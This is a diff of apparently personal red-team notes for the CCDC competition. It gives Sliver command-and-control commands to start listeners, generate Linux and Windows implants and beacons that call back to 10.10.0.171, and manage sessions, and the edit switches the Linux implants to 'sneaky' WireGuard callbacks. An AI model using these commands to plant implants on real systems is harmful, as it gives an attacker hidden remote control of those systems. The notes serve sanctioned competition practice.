KhaelK138/KhaelK138.github.io/markdown/RedTeamingCCDC.md

   - Start up tmux and run `sliver-server`
   - On the server: `new-operator --name malfuncti0nal --lhost localhost` and `multiplayer` to enable clients
   - On the client, outside of tmux: `sliver-client import {config_file}` and `sliver-client` to join
-- `mtls` can be used to start listening for incoming sessions
+- `wg` can be used to start listening for incoming sessions on a sneaky wireguard udp (use mtls otherwise if we dont get a callback)
+  - Seems it doesn't mix well with Windows, unfortunately.
+Plan on mtls for windows, wg for linux.
 - Then, use `generate` to create implants or beacons
-  - `generate --mtls {our_IP} --os linux` for an implant
+  - `generate --wg {our_IP} --os linux` for an implant
-  - `generate beacon --mtls 10.10.0.171 -j {jitter} -S {wait_seconds} --os linux`
+  - `generate beacon --wg 10.10.0.171 -j {jitter} -S {wait_seconds} --os linux`
-  - Windows: `generate --mtls 10.10.0.171 --os windows --arch x64 --format exe `
+  - Windows: `generate --mtls 10.10.0.171 --os windows`
 - `sessions` to show active sessions
   - `sessions -i {id}` to interact with session
     - `CTRL + d` to exit